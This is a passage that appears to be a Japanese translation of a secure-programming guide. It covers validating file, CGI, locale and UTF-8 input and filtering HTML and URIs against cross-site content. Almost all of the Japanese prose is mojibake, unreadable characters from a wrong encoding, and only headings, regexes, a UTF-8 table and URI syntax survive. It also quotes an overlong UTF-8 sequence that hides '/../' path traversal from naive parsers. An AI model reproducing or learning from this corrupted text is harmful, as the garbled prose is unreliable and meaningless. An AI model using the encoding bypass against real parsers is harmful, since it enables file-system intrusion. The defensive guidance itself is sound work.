IɃI[v̂܂B Unix CNȃVXe
ׂĂɓĂ͂܂킯ł͂܂B

 

4.4. t@C̓e

t@C̓eɂāAvO̓삪EꍇAMł郆
[U̓eύXł̂łȂ΁Ãt@CMpĂ͂
܂B܂MłȂ[UAt@C₻̃t@CfB
NgA̐efBNgCłĂ͂܂BłȂȂA
̃t@CMɒlȂ̂ƂĈȂ΂܂B

t@CɋLqĂAMłȂ[Û̂Ƃ
ÃhLgɏĂeɂāÃt@C
͂hłBɐlƃ}b`Ă邩Aobt@I[o
[t[ȂK`FbNĂB

 

4.5. Web x[X̃AvP[V̓( CGI XNvg)

Web x[X̃AvP[V(CGI XNvĝ悤)́AMłT[
oŉғA炩̕@ Web oRœ̓f[^󂯎Kv
B͂͊TĐMłȂ[U痈܂̂ŁA̓̓f[^
Kv܂BہA͐MłȂO҂Ă܂B
Section 6.15 ɂɏڂ񂪂܂BƂ΁ACGI XNvǵA
WIȊϐW͂ʂĎ擾܂B̃hLg
c̕ł́ACGI Ƀ^[Qbg𓖂ĂĘ_łBŔACGI
I Web RecsłyĂZpłA̓I
Web RecsZpʓIȖ_͓łB

CGI ̓͂̑AuURL GR[hꂽv`ɂȂĂ
_A؂ɂĂ܂B܂ 16 i HH ƂoCgl
\ɂ %HH Ƃ`Ƃ܂B CGI  CGI CúA
͂K؂ɃfR[hāAoCglǂ`FbNKv
܂B %00(NIL) %0A(s)̂悤ȋ^킵l܂ނׂĂ̓͂
ႢȂȂ΂܂B͂̃fR[h͌JԂsȂł
BȂƁAu%2500v̂悤ȓ͂AďĂ܂
(܂ %25 u%vɕϊǍʁu%00vԈ NIL LN^
ɕϊĂ܂܂)B

͂ɓȃLN^邱ƂŁACGI XNvgUP[X
܂܌܂BL̉ĂB

Web x[X̃AvP[Vňf[^` 1 ܂B
AuNbL[vłB̃NbL[[Uɒl񋟂ł̂ŁA\
hʂɎȂMł܂B܂ANbL[̓[UǐՂ
̂ɂ悭pA[ŨvCoV[N܂BʂƂ
āA[U̓NbL[𖳌ɂĂ܂ꍇAWeb AvP[V
̓NbL[KvƂȂ悤ɐ݌vǂł傤(AX̃
[UF؂Ȃ΂ȂƂȑŐc_Ă)BiN
bL[(݂̃ZbVłȂAȌNbL[)̗p
邩A邱ƂE߂܂BNbL[͊ȒPɈpĂ
܂łBیł́Ač̐{@ւ͉iNbL[ʂȗ
Oċ֎~Ă܂B[ŨvCoV[NQSzłB 
OMB guidance in memorandum M-00-13 (June 22, 2000) <http://cio.gov/
files/lewfinal062200.pdf> ĂBNbL[gpŒӂ
Ȃ΂Ȃ̂́AuEU̒ɂ̓vCoV[Evt@C(T[o
̃[gfBNgɂ p3p.xml ł)KvƂ̂邩
܂B

HTML ̃tH[ɂ̓NCAgł̓̓`FbNāAŕs
lh䂷̂܂B͕ʁAJavascript  ECMAscriptA
Java ŎĂ܂B̃`FbŃA[UɂƂĂ͖ɗ܂B
lbg[NoRŃANZXȂĂAuɁv`FbNł邩
BA̎̓̓`FbŃAZLeB̓_炷Ɩʂȃ`
FbNłBŔAU҂́usȁvl`FbN󂯂ɒ Web T
[oɑ邩łB̃`FbNʖڂɂ̂łA
Ƃł͂܂BWeb AvP[Vɑ΂āACӂ̃f[^𑗂
ȃvOKv͂܂BʓIɂ́AT[o͓̓`FbN
ׂĎOōsKv܂(tH[̃f[^NbL[)BT[o
́ANCAg肵ĂƂ͐MȂłB܂AN
CAg͈ʓIɁuMɑ`BoHvł͂ȂłBMł
`BoHɂẮASection 6.11 ɂɏ񂪂܂B

Microsoft  Active Server Pages(ASP)gē͂̑ÓmFc_
ɂẮAJerry Connolly  http://heap.nologin.net/aspsec.html 
Ȍɘ_Ă܂B

 

4.6. ̑̓

vOł́AKׂ͂ĂRg[ĂB setuid
 setgid ꂽvOł͍ɂ߂܂BŔÂ悤ȓ͂
܂ɑłB̑̓̓vOł́AL̓_lK
v܂B̓JgfBNgVOiAE}bv
(mmap)ASystem V R IPCA umask(VKɃt@C쐬ꍇ̃ft
Hg̃p[~bV肷) ɂĂłBvON鎞
AfBNg(chdir(2)gp)ύXꍇ́AtpXwł
ƖړĨfBNgɈړ邱ƂlĂB

 

4.7. R(J[)̑I

Rs[^AC^[lbgg߂ɂȂɂāAvO
̌╶T|[g邱Ƃ߂ĂĂ܂BƂ
̑̕Ɋ֘Avf̂Ƃ𕁒ʁuJ[(locale)vƌ܂B
J[ɑΉ邽߃vOCߒuۉ
(internationalization)v(i18n)ƌĂсÃJ[vO
񋟂邱Ƃun扻(localization)v(l10n)ƌ܂B

SʓIɂ͍ۉ͗ǂƂłẢߒŃZLeBNQ@
ɒǉ܂BMłȂ[UA]܂J[
łĂ܂܂B܂AJ[IۂɁAw肵̂ƈقȂ
J[͂Ă܂܂BƖh䂵ĂȂ΁Aꂪp
Ă܂\܂B

 

4.7.1. J[Iɂ

[JŋNvO(setuid  setgid vO܂)
́AϐJ[񋟂܂B܂葼̊ϐׂĂƓ
悤ɁAgpOɑIĂAp^ɔĂȂ`FbN
Ȃ΂Ȃ܂B

Web AvP[V́Ȁ Web uEU肵܂
(Accept-Language vwb_oR)BAuEUׂĐmɂ
nĂ킯ł͂Ȃ̂ ([UׂĂuEU𐳂ݒ肵
Ă킯ł͂Ȃ̂)AvĂقǖɗ܂B Web uEU
vꍇAĂ͂tH[̒lƂēnłB
ÃtH[̒lƓlɁA̒l͎gOɐǂ`Fb
NȂ΂܂B

J[́Aǂ̃P[XɂĂÃZNVŋc_
ƂӖł܂ɓȃP[XłBA̓͂͂قƂǍl
ĂȂ̂ŁAēƗĘ_܂Bɏ(Ř_܂)
gݍ킳ƁA[UǗĂ镶ɂđ̃vOŔC
̖߂sȃf[^𓮂ȂsK؂ȓU҂sł
肵܂B

 

4.7.2. J[𓮂JjY

J[EbZ[WI@ƂāAUnix CNȃVXeɂ͑傫
 2 ̃CuEC^tF[X܂B1 ́ucatgetsv
A 1 ́ugettextvłB catgets ̃Av[`́AׂĂ̕
j[NȔԍUĂāA̔ԍbZ[WĂe[
ũCfbNXƂĎgĂ܂B gettext ̃Av[`ł́A
(ʏ͉p)gāAe[uɂ镶|󂵂̂{܂
B catgets(3) ͋KiƂĔF߂Ă(X/Open Portability Guide  3
 Single Unix Specification )AvOŗp\łBugettext
ṽC^tF[X́A̋Kił͂܂(ƂƂ
UniForum ̒Ăł)AC^tF[XƂ catgets 藘pĂ
ƎvĂ܂(Sun  GNU ׂ̂ẴvO)By󒐁FUniForum 
ẮA http://www.uniforum.org/ Ăz 

Iɂ catgets ̕킸ɑ͂łAŋ߂̃}Vł΂
̍͂ق̂킸łB܂Acatgets() ӂ̎ʎqێEǗ
̂ʓ|ŁAgettext() ̃C^tF[X̕g₷ȂĂ܂B
ƂẮAgettext()gp邱ƂE߂܂B͎g₷
Ȃ܂B̌t̂܂܉Lۂ݂ɂȂłBgettext
ɂĂ GNU ̃hLg(info:gettext#catgets) ŁAՂ肢낢
ƔrĂ܂̂ŁAĂB

catgets(3)(ƂƊ֘AĂ catopen(3))̓ZLeB̖ɑ΂
ĂƂĂƎłB͊ϐł NLSPATH gpāAۉꂽ
bZ[W擾t@CǗĂ邩łB GNU C Cu
 NLSPATH  setuid  setgid vOł͖悤ɂȂĂ
܂B͖ɂ͗܂A̎œ삷vOhł
񂵁Â悤Ȗh䂪KvƂ́uȂv̑̃vO(CGI XN
vĝ悤)hł܂B

LpĂugettextṽC^tF[X́AȂƂ̒m
AӂĐݒ肵 NLSPATH ɑ΂ĐƎł͂܂BA
Đݒ肵 LC_ALL  LC_MESSAGES ́AN悤Ɏv܂B
܂Agettext  cat-compat.c ɂ bindtextdomain() [`g
NLSPATH ɗ邱ƂɂȂ܂B

 

4.7.3. l

Ƃ肠AMłȂ[UɊ]郍J[ݒ肳ȂAݒ
悤Ƃ鍑ۉ񂪃tB^ɕKv悤ɂĂB
tB^ł́AJ[̖O悤Ɍ肵Ă܂
B[UEvO( setgid  setuid ĂvO)́A
̒l̕ϐ擾܂B́ANLSPATH  LANGUAGEALANGAÂ
Ȃ LINGUASALC_ALLȂ LC_* (LC_MESSAGES łȂA
LC_COLLATEA LC_CTYPEALC_MONETARYALC_NUMERICALC_TIME )łB Web
AvP[Vł́A[Uv錾 Accept-Language vw
b_̓tH[̒lƂĒ񋟂܂(AvP[V́A
Content-Language: wb_[gāAԂf[^̎ۂ̌ݒ
ׂł)B[UȂ̊ϐݒ肵Ă(܂Asetgid 
setuid ĂvO)Aϐ̃tB^Öꕔ́A
̓tB^(Ƃ CGI XNvgp)̈ꕔƂĂ̒l`FbNł
܂B GNU  C Cuługlibcv́Asetgid  setuid v
Oł LANG ̒l󂯕tȂ̂܂(Ɂu/v𔺂
)ÃtB^ɂ̓G[邱Ƃ킩Ă܂(Ƃ΁ARed Hat
͂̃G[C邽߂ɁAglibc ̃Abvf[g 2000 N 9  1 
ɂĂ܂)B̎̃tB^O͋KiKvƂ͂Ă܂̂
AȂgtB^OsȂƂŁASɂł܂BtB
^O̐ݒɂẮA܂łB
łł́ǍɂĎgƂɊÂāAAhoCX
܂B

܂́A̐ݒŉlɂĈꌾqׂĂ܂B
́AʓI IETF RFC 1766 Œ`ĂW^OgĂ܂ (2 
̍R[h{^OƂǍɔCӂŃ_bV(-)ŋ؂Tu^O
Ƃ܂Bϐ̏ꍇAA_[XRAɎg܂)
BA͏_łƂ͌A3 ̍R[h܂Ȃp
ł悤ɂȂł傤B܂A@\gW[ 2 ̃tH[}
bg܂A݊Ƃ͂܂B X/Open tH[}b
g CEN tH[}bg(European Community Standard)łBǂ
ėǂł傤BT^IȒlƂẮAuCv(C J[)uENv(p)Au
FR_frv(tX̊KĂnŗpĂtX)
B܂Wł͂Ȃ̂gĂꍇAvÓuʖ
(alias)vgdg݂JKvɂ܂AWł͂Ȃ̂
悤ɂȂ܂(GNU  gettext Ȃ /usr/share/locale/locale.aliasA
X11 Ȃ /usr/lib/X11/locale/locale.alias ĂBualiasvł
ȂAualiases vƂKv邩܂)Bǂʂ͗p
͂łB gettext()̂悤ȃCúÃGCAX
Ď󂯕tȂ΂Ȃ炸Ał邾K؂ȒlKpłȂ΂܂
Bڂ́AFSF [1999] li18nux.org  Web TCgɂ܂
BtB^́AsKvȕׂł͂܂BɁu/v(M
ĂfBNg甲oĂ܂\)u..v(ʃfB
NgɈړłĂ܂\)͋Ă͂܂B NLSPATH
Ɋ܂܂鑼̊댯ȕɂ́Au%v(u\킷)Ɓu:v(fBNg
؂)܂BLĂ鑼̃}VpɂƁAɂ
āA̒̕l߂ɎgĂꍇ܂̂ŁA
~SłAƂȂĂ܂B

 

4.7.4. _

܂莄ƂẮANLSPATH 폜邩AĐݒ肷邩̂ǂ炩𐄏
܂BȂƁA̒lnĂ郆[UMȂ΂Ȃ
܂B HTTP ɂ Accept-Language wb_(gȂ)AJ[
w肷tH[̒lALŋϐ LANGUAGE  LANGAÂ
LINGUASA LC_ALLȂ LC_* ɑ΂ẮAMłȂ[Ũ
J[ null (lȂ)ݒ肷邩AK\ŜɃ}b`l
悤ɃtB^Ă(͍ŋ߂̃tB^Ɂu=vǉ
܂)B

 [A-Za-z][A-Za-z0-9_,+@\-\.=]*                                         

J[ŁÃp^Ƀ}b`Ȃ̂Ƃ܂
Ãp^ŁAJ[𗘗pUh悤łBAv
ꂽJ[ɗpł郁bZ[W݂ۏ؂͂܂B
̏ꍇłÃ[`̓ftHg̃bZ[W(ʏ͉p) \
܂BꂪZLeBƂ͂ȂȂ̂͊młB

{ɂȂA li18nux Œ񋟂Ă郍J[̃p^Ƀ}
b`̂gĂB

 ^[A-Za-z]+(_[A-Za-z]+)?                                               
 (\.[A-Z]+(\-[A-Z0-9]+)*)?                                             
 (\@[A-Za-z0-9]+(\=[A-Za-z0-9\-]+)                                     
  (,[A-Za-z0-9]+(\=[A-Za-z0-9\-]+))*)?$                                

ǂ̏ꍇAPOSIX ̊g(uVv)K\̍lɊÂĂ܂
(Unix CNȃVXeȂ regex(3)  regex(7)Ă)B

񌾌Ƃ̂́AWIȎiŏ\łȂẮA
T|[gĂƂ͌܂B̂Ƃ當̃GR[hƂ
ɒʂ邱ƂɂȂ܂B

 

4.8. ̃GR[h

4.8.1. ̃GR[hƂ

NɓnāAčł ASCII Zbggĕ̂Ă
Bč̃VXe͊{I ASCII T|[gĂ̂ŁAȒPɉp
̕łł܂BcOȂƂɁȂ̑̕唼
 ASCII ł͂܂͕słB܂łƁA܂܂ȍł낢
ȃeNjbNgāA܂܂Ȍŕ肵Ă܂B
ƂA܂܂݂ɂȂ鐢EŁAf[^肷
邱ƂɂĂ܂B

ŋ߁AISO  ISO 10646 𐮔AuUniversal Mulitple-Octet Coded
Character Set(UCS)vƂ܂B UCS ͑SE̕ꂼɑ΂āA31
rbg̒l`WłB UCS ̂͂߂ 65536 (16
rbgɓ܂)́AuBasic Multilingual Plane(BMP)vƂAgp
Ă錾قڃJo[邱ƂړIƂĂ܂B Unicode R\V
A Unicode Ki쐬܂B UCS ɏœ_𓖂āAǉł
K݂Aŉ^pł悤ɂĂ܂BƂ Unicode 
ISO 10646 ͋Đi߂Ă܂A肪Ƃɋ
ƂKv邱Ƃ𗝉Ał݂͂ɘAgĂ܂B

VK̃\tgEFAȂAISO 10646  Unicode {
đ悤ɂĂBA܂܂(ŗL)
WŏꂽÂhLgKv邩܂̂ŁA
MłȂ[ŨhLg̕WRg[łȂ
ƂKmFĂB (hLg̕ϊɉe傫
)B

 

4.8.2. UTF-8 Ƃ

\tgEFȂ唼́A16 rbg 32 rbg̕悤ɐ݌vĂ
炸A 8 rbgȏオKvȑꕶW쐬Ă܂B̂
UTF-8 ƂʂȃtH[}bgJÃvO⃉Cu
A\ł镶eՂɈ悤Ȍ`ɃGR[h邱
ƂƂȂ܂B UTF-8  IETF RFC 2279 Œ`Ă܂̂ŁA悭
Ƃ߂ꂽKiRɓǂ߂ėpł͍̂KȂƂłB UTF-8 ͉
ϒŃGR[h܂B0  0x7f(127)̕ 1 oCgł̂܂܃G
R[h܂A傫Ȓl̕ 2  6 oCg̏ƂăG
R[h܂(lɂăoCg܂)BGR[h́AL̑
ɓK悤ɓʂɐ݌vĂ܂( RFC  Linux Ɋ
܂Ă utf-8  man ̏ł)B

 E ܂ŗpĂ US ASCII (0  0x7f)͂̂܂܃GR[h
    ܂̂ŁA 7 rbg ASCII ̃t@C╶́AASCII
    ł UTF-8 łGR[hs܂B̕@́Aʂɂ
    ̕čvOf[^t@CɂƂĉʌ݊Ƃ_ŗD
    Ă܂B
   
 E 0x7f 傫 UCS ׂĂ̓}`oCgƂăGR[h
    A 0x80  0xfd ͈̔͂ɔ[߂܂B܂ASCII 𑼂̕
    ꕔƂĕ\邱Ƃ͂܂B̃GR[h@ł NIL ̂
    ȕgݍ߂̂ŁAvOłȂȂĂ܂܂
    B
   
 E UTF-8  2 oCg 4 oCgŒ蒷̕\Ԃ̕ϊ͊ȒP
    ł܂(ꂼ UCS-2 y UCS-4 ƌĂ΂܂)B
   
 E UCS-4 ł̎\[g̕т͂̂܂܂Ȃ̂ŁABoyer-Moore @
    ɂ鍂ASY UTF-8 ̃f[^ɂڗpł܂B
   
 E 2^31 rbĝׂĂ UCS R[h UTF-8 gpăGR[hł
    B
   
 E }`oCg̐擪̃oCg ASCII ł͂ȂꍇA
    l͈̔͂͏ 0xc0  0xfd ɂȂÃ}`oCg񒷂
    ̂炢Ȃ̂Ă܂Bc肷ׂĂ 0x80  0xbf ͈̔͂
    Ȃ܂BŊȒPɓ蒼܂B܂肠oCg
    ܂ĂAXLbv邱ƂŊȒPɁuv̕ɐi߂܂AuO
    v̕ɂȒPɍs߂ł܂B
   
v UTF-8 ̕ϊtH[}bǵÃeLXgƂ肷
̂ɏGłĂAÊ錾T|[gł܂B̏ȂAUS
ASCII t@CƉʌ݊ƓɁA̗DꂽĂ܂
B낢ȖړIɍ̗p邱ƂE߂܂BueLXgvt@CɃf
[^ۑꍇɂ͂ȂB

 

4.8.3. UTF-8 ̃ZLeB̉ۑ

UTF-8 ɌýAoCgɕs UTF-8 ƁAꂪZLe
Bz[ɂȂ邩ȂłB UTF-8 ́AuŒZvGR[h̗p
z肵Ă܂̂ŁÂ܂܃fR[hƁAKvȏɒG
R[ĥ󂯂Ă܂ȂłBہA̋Ki
́uŒZvłȂGR[hF߂Ă܂BŖƂȂ̂́A
̕@Ŋ댯ȓ͂s\ÂƂɂāA댯ȓ
ɑ΂ZLeBɂȂ邩ȂƂƂłB RFC ł
̖L̂悤ɋLڂĂ܂B

   
    UTF-8 ̎ł́As UTF-8 ǂ̂悤ɑΏ邩AƂ
    ZLeB̊ϓ_lKv܂BɂẮAU
    ҂h UTF-8 p[T UTF-8 ̕@ł͔F߂ĂȂINe
    bg𑗂肱݁ApĂ܂Ƃl܂B
   
    ̍ÚA͂ɑ΂ăZLeBɏd_`FbN
    sp[Tɑ΂āAɍIɎs܂BUTF-8 ŃGR[h
    ̂́AƂĕsȃINebgƂĉ߂Ă܂
    ɓ܂BƂ΁Ap[T 00 ƂPƂ̃INebg
    GR[hꂽꍇɂ NULL ֎~Ă邩܂
    BsłINebg 2 ł C0 80(Kvȏɒ)
    ͋ĂA NUL (00)ƂďĂ܂B̗̑
    ẮAINebgł 2F 2E 2E 2F ("/../")͋֎~Ă܂
    Asł 2F C0 AE 2E 2F ͋Ă܂Ă܂B
   
 

̌ɂĂ̂Ȃ_c Markus Kuhn ̃TCg http://
www.cl.cam.ac.uk/~mgk25/unicode.html ɂ UTF-8 and Unicode FAQ for
Unix/Linux œǂ߂܂B

 

4.8.4. UTF-8 ̐l

܂AUTF-8 ͂ƂĎ󂯕tꍇ́A̓͂ UTF-8 Ȃ
`FbNKv܂Bŋꗗ́A UTF-8 
ׂĂłB̃e[uɃ}b`Ȃ΁AƂ͌܂
BL̃e[u 1 Ԗڂ̃J UTF-8 ɃGR[he핶R[
hłB 2 Ԗڂ͕ǂ̂悤ɃoCiɃGR[h邩Ă
Buxv̓f[^邱(0  1)܂AŒZGR[hłȂ
ɂ͔F߂ׂłȂP[X܂BṒAꂼ̃oCg
鐳l(16 i\)łBāAX̕ẼJ̃p^
̂ǂɓĂ͂܂̂AvOŃ`FbNKv܂Bu-v
͐l͈̔([܂)\킵Ă܂BA񂪐
UTF-8 ̕łƌƂŁA󂯓ėǂƂ͌܂(
̑̃`FbNKv)AʁÃ`FbNO UTF-8 ̐`
FbNKv܂B
 

Table 4-1. Legal UTF-8 Sequences


UCS Code (Hex)      Binary UTF-8 Format   Legal UTF-8 Values  
                                          (Hex)               

00-7F               0xxxxxxx              00-7F               

80-7FF              110xxxxx 10xxxxxx     C2-DF 80-BF         

800-FFF             1110xxxx 10xxxxxx     E0 A0*-BF 80-BF     
                    10xxxxxx                                  

1000-FFFF           1110xxxx 10xxxxxx     E1-EF 80-BF 80-BF   
                    10xxxxxx                                  

10000-3FFFF         11110xxx 10xxxxxx     F0 90*-BF 80-BF     
                    10xxxxxx 10xxxxxx     80-BF               

40000-FFFFFF        11110xxx 10xxxxxx     F1-F3 80-BF 80-BF   
                    10xxxxxx 10xxxxxx     80-BF               

40000-FFFFFF        11110xxx 10xxxxxx     F1-F3 80-BF 80-BF   
                    10xxxxxx 10xxxxxx     80-BF               

100000-10FFFFF      11110xxx 10xxxxxx     F4 80-8F* 80-BF     
                    10xxxxxx 10xxxxxx     80-BF               

200000-3FFFFFF      111110xx 10xxxxxx     too large; see below
                    10xxxxxx 10xxxxxx                         
                    10xxxxxx                                  

04000000-7FFFFFFF   1111110x 10xxxxxx     too large; see below
                    10xxxxxx 10xxxxxx                         
                    10xxxxxx 10xxxxxx                         

 

ɐGꂽ悤ɁAWɂ ISO 10646AUnicode Ƃ 2 ̋Ki
܂Å蓖ĂɊւĂ͓Ă܂BAISO/IEC
10646-1:2000  IETF RFC ɂ UTF-8 ̒`ł́A5A6 oCg
GR[hT|[gĂA Uniforum  Unicode ͈̔͊OɃG
R[hĂ܂B̂悤ȒĺAUnicode ƂĂ̓T|[g
ĂȂ̂ŁAISO 10646 ̏̃o[Włl̐󂯂
Ǝv܂B܂A5A6 oCg UTF-8 ̃GR[hP[X
قƂǖAʏ͋ۂȂ΂܂(ʂȖړI)B

l͈̔͂肷͍̂łBĎۂ̃hLg̏
̔łł́AԈڂLڂĂ܂(镶
܂ĂP[X܂)BJ҂́ACuɐ UTF-8
̒l`FbN@\Kv܂B`FbN𐳂ŝ
ƂĂȂ̂ŁB

ꍇɂāA16 i C0 80 ɑ΂āAقǃVrAɂȂ(
͓ŉƂ)P[X邩ȂAƂ_Ă܂
B͒镶ŁAĂ܂ ASCII  NUL(NIL)ɑ
ƂɂȂ܂BC  C++ ł NIL ʏ̕ɓĂ܂Ƃ
ȂƂɂȂ܂̂ŁAf[^Xg[̈ꕔƂ NIL \
ɁA̕тpP[X܂BJava ł͂̑𐳎ɋLڂ
Ă܂Bf[^sɁAIɂ C0 80 DɈĂ
BAɌƁÃf[^ۑO 00 ɕϊKv
܂BKvɂ܂AuVrAɂȂ炸ɁvAC0 80  UTF-8 
f[^Xg[ƂĔF߂Ă悢܂BZLeBɉe
łȂȂA^pƂϓ_ŋ̂͂悢ĂƎv܂B

̑Ώ͔łB Unicode tH[ŊJ C ɂϊ[`
𒲍ȂA ftp://ftp.unicode.org/Public/PROGRAMS/CVTUTF/
ConvertUTF.c 𗘗pĂ݂Ă͂ǂł傤B̃[`I[v\[
Xǂ͂肵܂̂(CZXǂłAC\ǂ
܂)A̓_͒ӂĂB

 

4.8.5. UTF-8 ֘Aɂ

̃ZNVł UTF-8 _܂BUCS őoCgGR[ĥ
łʓIŁAe̍ۉeLXgȒPɈ邩łB
AꂾGR[hłȂ̂łB̃GR[hƂ
UTF-16  UTF-7 ̂悤ȃGR[hAlȖĂ܂̂
A悤ȗRŌ؂Ȃ΂܂B

 1 ̖ƂāA̕\@ŕ\̂ ISO 10646  Unicode
ɂ_łBƂ΁AANZg̒ɂ 1 (ANZgt)
\ł̂܂Ȃgݍ킹(Ƃ΁Ax[XɂȂ镶
ɃANZĝ) ŕ\ł̂܂B 2 ̌`́A
ł邩܂BȂXy[X}ʁAقȂ̂
ړ悤Ɍ邱Ƃ܂B̂悤ȉBꂽeLXg݂
󋵂ɂāAvOɉeo_ɒӂ𕥂ĂB͈
ؓł͍sȂłBvÓA̕ǂ̂悤ɕ\
̂SɏĂNCAgɑ΂āÂ悤Ȃ
ĂȂꍇ唼ł(NCAg̃tHg\AJ[
ɈˑĂ̂)B

 

4.9. TCgɂ܂ӂRec(Cross-site Malicious Content)
h

MłȂ[Ũf[^󂯕tāÃf[^̃[Uɓn
vO܂BԖڂ̃[ŨAvP[VAɂ
Ă͂̃[UɂƂĖfɂȂ鏈邩܂B Web A
vP[Vł͂肪ȖłB̖TCgɂ܂
Rec(Cross-site Malicious Content)ƌĂԂƂɂ܂B܂
A(tH[f[^܂)K`FbNāAtB^邩AG
R[h邩ȂƂ܂Bڂ́ASection 6.15 Ă
B

ƂāAWeb AvP[Vւׂ̓͂͂āAtB^(
̖N폜)AGR[h(̖N
NȂ悤ɃGR[h)A؂(mɁuSȁvf[
^ʉ߂悤ɂ)Ȃ΂ȂƂӖ܂BtB^
O⌟؂́A͎ɏI点ǂ̂ʂłAGR[h
͎ło͎łς܂܂B͂Ƀf[^ʂĂ܂
A͎Ƀf[^GR[hǂƎv܂(YȂł傤
)Bf[^ĂȂAGR[h͎ł͂Ȃo͎
_ɂẮA܂ǂ炪悢_oĂ܂B

 

4.10. ĕ\\̂ HTML  URI ɂ̓tB^

TCgɂ܂ӂRec(Cross-site Malicious Content)h
Ȃ΂ȂȂIȃP[X 1 ɁAWeb AvP[V
܂B Web AvP[V́A郆[U HTML  XHTML 
A𑼂̃[Uɓn悤ɐ݌vĂ܂(ڂ 
Section 6.15 Ă)BL̃TuZNVł́Aɂ̎̓
͂̃tB^OɂĘ_܂BP[XKv
OɂȂĂłB

 

4.10.1. HTML f[^폜ւ肷

(X)HTML ^Oł邾폜΁AłSɂȂ܂B΁A^
Oɂe͉N炸A܂̂rIȒPłBȑOwE
悤ɁÄꗗmFĂ͂łÄꗗɂȂ
ۂA폜ł͂łB̈ꗗɍڂĂ
ƂāAPɂ̃tB^֎̕Ă͂܂B̕
Ƃ́u<vu>vAu&v(ɎgȂdṕu"v)łBu
EU HTML ̎dlɏ]ē삷邾ȂAu>v͍폜Kv͂
BAۂ͍폜Ȃ΂܂BŔAJnu<v
̃y[W̒҂{͒uAƐĂuEU邩
łB́u菕vAU҂ɂޗ]n^āAu>vgāu
<vƂ]܂ȂĂ܂܂B 

W HTML őɂ́Aʏ ISO-8859-1(ۉeLXg𑗂鎞ł
) g܂BătB^͐䕶(s^u͕ʂ OK)̂
ƂǂƃnCrbgɂ镶폜ׂłB

̂ŖɂȂ̂ 1 ́AۉeLXg͂[U
̃eLXgmȂɏĂ܂Aт肷Ƃ_łB
ȕ̌xȂ폜ƁÃf[^͊SɂȂȂAɂ
čč\̂悤܂BI 1 ƂāÂ悤ȕ
~ŁAgƂ[UɃG[bZ[W𑗂ԂĂ
@܂BȂƂŃ[UɌxo܂A[U]
ł@\񋟂ł킯ł͂܂B̑ɂ́Ãf[^G
R[h@ƌ؂@܂BɂĂ͎ɋc_
܂B

 

4.10.2. HTML f[^GR[h

ɂقڈSȕ@ƂāA댯ȕϊĂ܂AHTML ňӖ
AƂ̂܂BׂẮu<vu&lt;vɁAu>vu&gt;v
ɁAu&vu&amp;vɂĂ܂΂IłBۉȂǂu&#
value;vƂ`gāALatin-1 ɃGR[hł܂BŌ̃Z~R
YȂłBRA̓GR[hǂ邩𗝉Ă
Ȃ΂΁Aۉ̃GR[h͂ł܂B

ōl댯ɂ́AGR[hʂ܂ 2 񏈗Ɛ
コ܂Ă܂AƂۂ܂B̂ł́A
ȂƂ͂́uړIvł̂󂯂Ƃ[Uɓ`܂
B

 

4.10.3. HTML f[^؂

AvP[Vׂċ@\ߒŁAHTML O҂󂯕tȂ
΂Ȃ炸A̎󂯕teʂ̃[Uɑ΂đꍇ܂B
͗pSȂ΂܂BȂ́AƂĂȂnĂ܂
B{ɂ邱ƂKvȂ̂A⎩ĂBƂ
 HTML 󂯓AƂlłAZLeBɐʂlX
Ԃł͎^ۗ_łBȂȂA擾̂͋ɂ߂čłB

AAvP[V HTML 󂯂𓾂AXN𕉂̉
lƎv̂ȂAȂƂ HTML ́uSȁvR}ḧꗗmF
ĂÃR}h悤ɂĂB

S HTML ^OŃAvP[V(QXgubN̂悤)ɂƂĖɗ
̂Œɂ܂BȒPȃRgĂ܂B <p>
(pOt)A <b> ({[h)A <i> (C^bN)A <em> ()A
<strong> (ɋ)A <pre> (Oɐ`ĂeLXg), <br> (
sBp̃^O͕Kv܂) LɑΉďI^O܂B

́uSȁvHTML R}hQ󂯓邾ł͂ȂA炪
qɂȂĕĂ(܂AHTML R}huΉƂĂv) 
ɕKĂB XML ł́Au`(well-formed)vf[^
Ăł܂BW HTML ĂȂAOł傤(Ƃ
΁A<p> oĂÔƂ </p> z肷͖̂ȂƎv܂)B
AHTML ł\ׂ(ΉƂ邽߂̕p^Oł
ꍇ)󂯓悤Ƃ̂́AAvP[V唼ɂƂĕKv
͂܂BƂ͂茾ƁAXHTML(HTML ̂) ɒł
ƂȂA`KvłB܂AHTML ^O͑啶A
܂B^O͑啶łAłAĎgĂ܂܂B
AXHTML 󂯓ȂA^Oׂ͂ďɂȂ΂
܂(XML ͑啶Aʂ܂BXHTML  XML gA^O
ł邱ƂKvł)B

ł TIPS słĂ܂Bʏ́AHTML eLXgy
ׂ^ȌWɊւ鉽̐݌vsȂǂł傤B
΁AeꂽeLXguCvTCg̃eLXgƂČ
ȂȂ܂(Uh܂)BǂȑȂ^Cvl
`FbN邱ƂȂɎ󂯓Ă͂܂B Javascript ̂悤ɁA
[UguɊދꂪ鑮񂠂܂B̑
T|[gKv܂BL̈ꗗɂ́A܂݂
ƂɒڂĂBꂪSAmȕ@Ȃ̂łBSł͂Ȃ
^OgꂽȂA炭xbZ[Woǂł傤B
ꂪIłȂȂA댯ȕGR[h(Ƃ΁u<v
u&lt;vɂ)A[ÜSێAf[^ȂȂ邱Ƃ͖h
B

 

4.10.4. nCp[eLXgN(URI  URL)؂

Ӑ[Ȃ炨CÂƎv܂AnCp[eLXg̃N^O <a>
S HTML ^OƂ͂Ă܂B炩ɁA<a href="safe uri">(nC
p[eLXgN)SȈꗗɒǉł̂ɂ炸ł(e
`FbNȂÂǂ̑Ȃ)BAvP[VK
vƂĂȂAǉĂ܂܂BO҂N𒣂邱
ƂŁASɒቺ܂BŔAuS URIv̒`ɂ܂
B[1] ꂪʓIɂ͂ƂĂʓ|ɂȂ܂B̃uEÚA[U
ɂƂĊ댯Ȃ URI ׂĎ󂯎Ă܂łB
̃ZNVł́AO҂ėāA̐lɍĕ\ URI ̌
@ƁA URI  HTML ɂǂ̂悤ɑgݍނɂĘ_܂B

܂ URI ̕@ƌčs܂傤(܂܂ȎdlŒ`Ă
̂)B URI ́u΁vu΁v\łB URI ͂̂悤ɂȂ
B

scheme://authority[path][?query][#fragment]                            

URI ̓XL[(uhttpv̂悤)͂܂Au://vAӔCҕ
(authority)A (uwww.dwheeler.comv̂悤)ApX(fBNgt@
Ĉ悤) Ƒ܂B̌ɋ^╄uăNGAn
bV(u#v)uătOgʎq肵܂BIvV
 [] ň͂ł܂Bɂ́ANGtOg܂ URI 
͂܂BXL[ɂ́AȂf[^(Ƃ΃pXNGA
tOg)AŗL̏ǉꍇ񂠂܂BX
L[́uӔCҕvɃIvVŃ[UpX[hA|[gԍ
Ăꍇ悭܂B͎̒ʂłB

 [username[:password]@]host[:portnumber]                               

